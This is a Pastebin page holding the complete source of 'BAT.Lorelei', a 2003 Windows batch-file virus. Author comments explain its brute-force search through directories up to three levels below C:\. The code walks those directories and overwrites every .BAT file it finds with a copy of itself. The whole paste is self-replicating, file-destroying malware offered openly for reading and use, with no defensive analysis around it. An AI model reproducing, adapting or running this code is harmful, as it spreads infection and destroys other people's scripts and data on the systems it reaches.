Advertisement
FlyFar

Virus.BAT.Lorelei - Source Code

Jul 3rd, 2023
885
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.52 KB | Cybersecurity | 0 0
  1. :: BAT.Lorelei
  2. ::  by Second Part To Hell[rRlf]
  3. ::  www.spth.de.vu
  4. ::  spth@aonmail.at
  5. ::  written on 25.07.2003
  6. ::  in Austria
  7. ::
  8. ::  In my opinion, this is no real virus, but a new, never seen engine.
  9. ::  It searches in the next 3 directories for bat files. It searches the directory names
  10. ::  in a brute-force way. That's also the reason, why it needs very long to run (about 45sec
  11. ::  at my 1.400MHz). Now let me show you, what I mean:
  12. ::  ---
  13. ::  C:\asterix\obelix\idefix\roma
  14. ::            \zzz
  15. ::    \windows\system\...
  16. ::    \programs
  17. ::  ---
  18. ::  It will infect every .BAT file in the directories (C:\*.* | C:\asterix\*.* | C:\asterix\obelix\*.* |
  19. ::  C:\asterix\obelix\idefix\*.*). The engine isn't perfect now, but I don't want to work on it anymore.
  20. ::  But a perfect version of that would be the same as the command 'for /r C: ...' in Win00|XP|NT.
  21. ::  Unfortunately, I had no time to test it at Win 9x, but at WinXP it works fine, so I guess, it should also
  22. ::  work on Win9x, because I didn't use any special commands.
  23. ::  One other thing is the 'goto %BackJmpLable%'. You are able to do cool things with that. And you're also
  24. ::  able to short your codes a lot.
  25. ::
  26. ::  OK, I think, that's everything. I wish you fun while you are trying to understand this :)
  27. ::
  28. ::
  29. :: --------------------------------------< BAT.Lorelei >--------------------------------------
  30. cls
  31. @echo off
  32. set saveA=Lorelei
  33. set saveB=Lorelei
  34. set saveC=Lorelei
  35. set buffer=Loro
  36. :Again
  37. set counter=%counter%!
  38. if %counter%==!!! exit
  39. set count=Lorelei
  40. set StageA=StageA
  41. set StageB=StageB
  42. set StageC=StageC
  43. set exspth=exspth
  44. :GetRoot
  45. cd..
  46. set GRcheck=%GRcheck%x
  47. if %GRcheck%==xxxxxxxx goto GotRoot
  48. goto GetRoot
  49. :GotRoot
  50. set GRcheck=
  51. C:
  52. set spth=C:\
  53. set Oldspth=%spth%
  54. set BackJmpLable=DirCheck
  55. goto infect
  56.  
  57. :DirCheck
  58. dir %spth%* >C:\Lorelei
  59. find "<DIR>" C:\Lorelei>trash
  60. set ThOfTr=a
  61. if %spth%==%exspth% set ThOfTr=gothic
  62. if NOT ERRORLEVEL 1 set BackJmpLable=SetDirCheck
  63. if NOT ERRORLEVEL 1 set Oldspth=%spth%
  64. if NOT ERRORLEVEL 1 goto AddNewLetter
  65. set spth=%Oldspth%
  66. goto DirCheck
  67.  
  68. :SetDirCheck
  69. cd %spth%>trash
  70. if NOT ERRORLEVEL 1 set BackJmpLable=SDCfinish
  71. if NOT ERRORLEVEL 1 goto infect
  72. goto DirCheck
  73.  
  74. :SDCfinish
  75. if %spth%==%saveA% set ThOfTr=e
  76. if %spth%==%saveB% set ThOfTr=e
  77. if %spth%==%saveC% set ThOfTr=e
  78. if %ThOfTr%==e set spth=%Oldspth%
  79. if %ThOfTr%==e goto DirCheck
  80. set SDCvar=SDCvar
  81. if NOT %StageA%==Lorelei set SDCvar=1
  82. if %SDCvar%==1 set StageA=Lorelei
  83. if %SDCvar%==1 goto Savevar
  84. if NOT %StageB%==Lorelei set SDCvar=2
  85. if %SDCvar%==2 set StageB=Lorelei
  86. if %SDCvar%==2 goto Savevar
  87. if NOT %StageC%==Lorelei set SDCvar=3
  88. if %SDCvar%==3 set StageC=Lorelei
  89. if %SDCvar%==3 goto SaveVar
  90. exit
  91.  
  92.  
  93. :AddNewLetter
  94. set ThOfTr=a
  95. set AddNewLetterVar=%AddNewLetterVar%y
  96. if %AddNewLetterVar%==y if %exspth%==%spth% if %count%==! goto Again
  97. if %AddNewLetterVar%==y if %exspth%==%spth% set count=!
  98. if %AddNewLetterVar%==y set exspth=%spth%
  99. if %AddNewLetterVar%==y set spth=%spth%a
  100. if %AddNewLetterVar%==yy set spth=%spth%b
  101. if %AddNewLetterVar%==yyy set spth=%spth%c
  102. if %AddNewLetterVar%==yyyy set spth=%spth%d
  103. if %AddNewLetterVar%==yyyyy set spth=%spth%e
  104. if %AddNewLetterVar%==yyyyyy set spth=%spth%f
  105. if %AddNewLetterVar%==yyyyyyy set spth=%spth%g
  106. if %AddNewLetterVar%==yyyyyyyy set spth=%spth%h
  107. if %AddNewLetterVar%==yyyyyyyyy set spth=%spth%i
  108. if %AddNewLetterVar%==yyyyyyyyyy set spth=%spth%j
  109. if %AddNewLetterVar%==yyyyyyyyyyy set spth=%spth%k
  110. if %AddNewLetterVar%==yyyyyyyyyyyy set spth=%spth%l
  111. if %AddNewLetterVar%==yyyyyyyyyyyyy set spth=%spth%m
  112. if %AddNewLetterVar%==yyyyyyyyyyyyyy set spth=%spth%n
  113. if %AddNewLetterVar%==yyyyyyyyyyyyyyy set spth=%spth%o
  114. if %AddNewLetterVar%==yyyyyyyyyyyyyyyy set spth=%spth%p
  115. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyy set spth=%spth%q
  116. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyy set spth=%spth%r
  117. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyy set spth=%spth%s
  118. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyy set spth=%spth%t
  119. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyy set spth=%spth%u
  120. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyy set spth=%spth%v
  121. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%w
  122. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%x
  123. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%y
  124. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%z
  125. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyyy set AddNewLetterVar=
  126. goto %BackJmpLable%
  127.  
  128. :SaveVar
  129. set spth=%spth%\
  130. goto DirCheck
  131.  
  132.  
  133. :infect
  134. for %%a in (*.bat) do copy %0 %%a
  135. goto %BackJmpLable%
Tags: batch virus SPTH
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement